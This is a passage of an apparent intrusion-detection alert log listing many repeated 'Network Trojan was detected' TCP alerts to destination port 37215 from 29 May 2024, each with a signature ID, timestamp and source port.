                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.704646
                SID:2829579
                Source Port:43578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669561
                SID:2835222
                Source Port:56288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.725594
                SID:2835222
                Source Port:60496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039703
                SID:2829579
                Source Port:58260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732444
                SID:2835222
                Source Port:52148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419951
                SID:2835222
                Source Port:50774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502933
                SID:2835222
                Source Port:53428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811821
                SID:2835222
                Source Port:46252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520423
                SID:2829579
                Source Port:33334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359750
                SID:2835222
                Source Port:36494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587491
                SID:2835222
                Source Port:43086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.723631
                SID:2835222
                Source Port:54736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945524
                SID:2829579
                Source Port:34364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418323
                SID:2835222
                Source Port:56468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009505
                SID:2835222
                Source Port:51652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886158
                SID:2835222
                Source Port:56620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.450567
                SID:2835222
                Source Port:38212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975209
                SID:2835222
                Source Port:56840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795357
                SID:2829579
                Source Port:43370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025439
                SID:2835222
                Source Port:44300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943324
                SID:2835222
                Source Port:45128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882323
                SID:2829579
                Source Port:32898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240301
                SID:2835222
                Source Port:60772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262020
                SID:2835222
                Source Port:51566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364746
                SID:2835222
                Source Port:59350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858910
                SID:2829579
                Source Port:59802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532047
                SID:2829579
                Source Port:46320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384974
                SID:2829579
                Source Port:47110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.810519
                SID:2829579
                Source Port:51048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155021
                SID:2829579
                Source Port:47484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.769527
                SID:2835222
                Source Port:47816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784765
                SID:2829579
                Source Port:57446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155098
                SID:2835222
                Source Port:57234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824196
                SID:2835222
                Source Port:60588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666930
                SID:2829579
                Source Port:44342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.895960
                SID:2835222
                Source Port:37552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839070
                SID:2835222
                Source Port:44026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845826
                SID:2829579
                Source Port:50116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899438
                SID:2829579
                Source Port:52508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807235
                SID:2835222
                Source Port:54798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287660
                SID:2829579
                Source Port:60622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782882
                SID:2829579
                Source Port:43932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075183
                SID:2829579
                Source Port:35888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867948
                SID:2835222
                Source Port:49208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418103
                SID:2835222
                Source Port:36374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890123
                SID:2835222
                Source Port:58810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.920080
                SID:2829579
                Source Port:44066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563552
                SID:2829579
                Source Port:53428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586867
                SID:2835222
                Source Port:47538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963000
                SID:2829579
                Source Port:59036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644978
                SID:2829579
                Source Port:44952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.645106
                SID:2829579
                Source Port:44492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597226
                SID:2829579
                Source Port:52688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731464
                SID:2829579
                Source Port:60438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714668
                SID:2829579
                Source Port:36026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269775
                SID:2835222
                Source Port:59902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558227
                SID:2829579
                Source Port:50062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706455
                SID:2835222
                Source Port:54410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.946847
                SID:2835222
                Source Port:54328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655595
                SID:2829579
                Source Port:41320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734599
                SID:2829579
                Source Port:42508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567398
                SID:2829579
                Source Port:53728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.737438
                SID:2835222
                Source Port:45912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149308
                SID:2829579
                Source Port:52700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155006
                SID:2835222
                Source Port:53400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728681
                SID:2829579
                Source Port:49320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659623
                SID:2829579
                Source Port:49936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226753
                SID:2835222
                Source Port:33446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583054
                SID:2829579
                Source Port:37328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626694
                SID:2835222
                Source Port:50948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014685
                SID:2835222
                Source Port:52876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666218
                SID:2835222
                Source Port:35094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977202
                SID:2835222
                Source Port:59930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558042
                SID:2835222
                Source Port:37702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181443
                SID:2829579
                Source Port:54218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738332
                SID:2835222
                Source Port:51472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559610
                SID:2829579
                Source Port:35754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946369
                SID:2829579
                Source Port:36354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417090
                SID:2829579
                Source Port:43518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813360
                SID:2829579
                Source Port:41362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385395
                SID:2829579
                Source Port:43544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178384
                SID:2829579
                Source Port:53018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180648
                SID:2835222
                Source Port:56760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.080308
                SID:2835222
                Source Port:42446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329187
                SID:2829579
                Source Port:48574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711109
                SID:2835222
                Source Port:50078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618577
                SID:2829579
                Source Port:34834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066486
                SID:2835222
                Source Port:51594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786691
                SID:2835222
                Source Port:36304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776833
                SID:2829579
                Source Port:52692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731137
                SID:2829579
                Source Port:47112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969888
                SID:2829579
                Source Port:40034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834630
                SID:2829579
                Source Port:47900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002139
                SID:2829579
                Source Port:60006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088062
                SID:2829579
                Source Port:36054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938159
                SID:2829579
                Source Port:49080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.524040
                SID:2835222
                Source Port:53304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836219
                SID:2829579
                Source Port:44774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666383
                SID:2829579
                Source Port:40784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508790
                SID:2829579
                Source Port:51990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626718
                SID:2835222
                Source Port:60244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555708
                SID:2835222
                Source Port:47544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277478
                SID:2829579
                Source Port:53036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848908
                SID:2835222
                Source Port:57414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160407
                SID:2835222
                Source Port:33972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.975163
                SID:2835222
                Source Port:32924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598173
                SID:2829579
                Source Port:60688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667152
                SID:2835222
                Source Port:38364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325302
                SID:2829579
                Source Port:43362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.275864
                SID:2835222
                Source Port:56886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.336040
                SID:2829579
                Source Port:46596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556195
                SID:2829579
                Source Port:54936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091201
                SID:2829579
                Source Port:58316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278261
                SID:2835222
                Source Port:37648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.224040
                SID:2835222
                Source Port:60250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662663
                SID:2835222
                Source Port:55462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.139959
                SID:2829579
                Source Port:54458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.715998
                SID:2829579
                Source Port:46270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810108
                SID:2829579
                Source Port:46322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873012
                SID:2829579
                Source Port:33788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972292
                SID:2829579
                Source Port:41564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653699
                SID:2835222
                Source Port:43226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285657
                SID:2835222
                Source Port:36852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.888946
                SID:2835222
                Source Port:36630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.101657
                SID:2835222
                Source Port:58442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141039
                SID:2829579
                Source Port:56140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932096
                SID:2835222
                Source Port:60566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789129
                SID:2829579
                Source Port:33318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437739
                SID:2835222
                Source Port:52804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898125
                SID:2835222
                Source Port:40340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900688
                SID:2835222
                Source Port:40268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.522048
                SID:2835222
                Source Port:45816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178775
                SID:2829579
                Source Port:59654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023192
                SID:2835222
                Source Port:35142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285596
                SID:2835222
                Source Port:53938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165736
                SID:2835222
                Source Port:40134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212058
                SID:2835222
                Source Port:37244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786879
                SID:2829579
                Source Port:55788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898257
                SID:2829579
                Source Port:43220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317970
                SID:2829579
                Source Port:33572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227723
                SID:2835222
                Source Port:60716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730654
                SID:2829579
                Source Port:50692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041328
                SID:2835222
                Source Port:41082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897313
                SID:2829579
                Source Port:56634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975155
                SID:2835222
                Source Port:36240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897294
                SID:2835222
                Source Port:38398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276648
                SID:2835222
                Source Port:42448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964512
                SID:2829579
                Source Port:52920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517853
                SID:2829579
                Source Port:46620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914685
                SID:2835222
                Source Port:48518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988618
                SID:2835222
                Source Port:60692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287405
                SID:2829579
                Source Port:43168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519229
                SID:2829579
                Source Port:39152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508508
                SID:2829579
                Source Port:53486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659674
                SID:2835222
                Source Port:48082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855769
                SID:2829579
                Source Port:53364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163423
                SID:2835222
                Source Port:47626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624730
                SID:2835222
                Source Port:59910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927802
                SID:2835222
                Source Port:36876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685670
                SID:2829579
                Source Port:34428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280615
                SID:2829579
                Source Port:36256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532073
                SID:2829579
                Source Port:38812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180561
                SID:2835222
                Source Port:49392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277145
                SID:2835222
                Source Port:33400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842378
                SID:2829579
                Source Port:57012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419998
                SID:2829579
                Source Port:53840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468434
                SID:2829579
                Source Port:45616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360381
                SID:2835222
                Source Port:48496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321570
                SID:2829579
                Source Port:43400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833534
                SID:2829579
                Source Port:58198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785689
                SID:2835222
                Source Port:42738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909221
                SID:2829579
                Source Port:36182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271712
                SID:2835222
                Source Port:32956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414812
                SID:2829579
                Source Port:56742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782463
                SID:2835222
                Source Port:48938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162604
                SID:2835222
                Source Port:33954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826312
                SID:2829579
                Source Port:52318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766311
                SID:2829579
                Source Port:40194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002102
                SID:2835222
                Source Port:56686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767456
                SID:2829579
                Source Port:60740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559013
                SID:2835222
                Source Port:45646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779566
                SID:2829579
                Source Port:48048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266438
                SID:2835222
                Source Port:56840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435888
                SID:2829579
                Source Port:34538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222748
                SID:2835222
                Source Port:49292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870297
                SID:2829579
                Source Port:57542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629861
                SID:2829579
                Source Port:47956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845678
                SID:2829579
                Source Port:47594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441274
                SID:2829579
                Source Port:46262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583990
                SID:2829579
                Source Port:43520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776630
                SID:2829579
                Source Port:60894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335117
                SID:2835222
                Source Port:57518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362496
                SID:2835222
                Source Port:38374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287070
                SID:2829579
                Source Port:52760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776875
                SID:2835222
                Source Port:53750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584578
                SID:2829579
                Source Port:57382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767486
                SID:2835222
                Source Port:54024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
